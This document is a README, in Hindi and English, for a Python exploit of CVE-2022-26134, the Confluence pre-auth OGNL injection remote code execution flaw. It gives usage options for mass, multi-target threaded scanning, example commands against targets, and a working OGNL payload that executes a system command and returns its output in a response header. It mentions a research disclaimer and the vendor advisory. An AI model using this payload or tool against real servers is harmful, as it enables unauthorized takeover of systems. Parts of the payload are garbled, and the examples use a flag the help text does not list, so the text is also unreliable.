
Confluence Server/Data Center के लिए Python exploit, OGNL injection के माध्यम से pre-auth RCE (CVE-2022-26134)। यह single और multi-target execution को command injection और threaded scanning के साथ समर्थन करता है।
कन्फ्लुएंस प्री-ऑथ रिमोट कोड एक्ज़ीक्यूशन OGNL इंजेक्शन के माध्यम से (CVE-2022-26134)
यह शोषण केवल शोधकर्ताओं द्वारा भेद्यता के प्रदर्शन को सुविधाजनक बनाने के लिए है। मैं अवैध कार्यों की अनुशंसा नहीं करता हूँ और इस स्क्रिप्ट के किसी भी दुर्भावनापूर्ण उपयोग के लिए कोई जिम्मेदारी नहीं लेता।

python3 exploit.py -h
Usage: exploit.py [options]
Options:
-h, --help show this help message and exit
-u URL, --url=URL Base target uri (ex. http://target-uri/)
-f FILEHOSTS, --file=FILEHOSTS
example.txt
-t THREADS_SET, --threads=THREADS_SET
-m TIMEOUT, --maxtimeout=TIMEOUT
-o OUTPUT, --output=OUTPUT
-c COMMAND, --cmd=COMMAND
$ python3 exploit.py -u http://xxxxx.com -c id

$ python3 exploit.py -f urls.txt -p -c id

${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
• https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
• https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis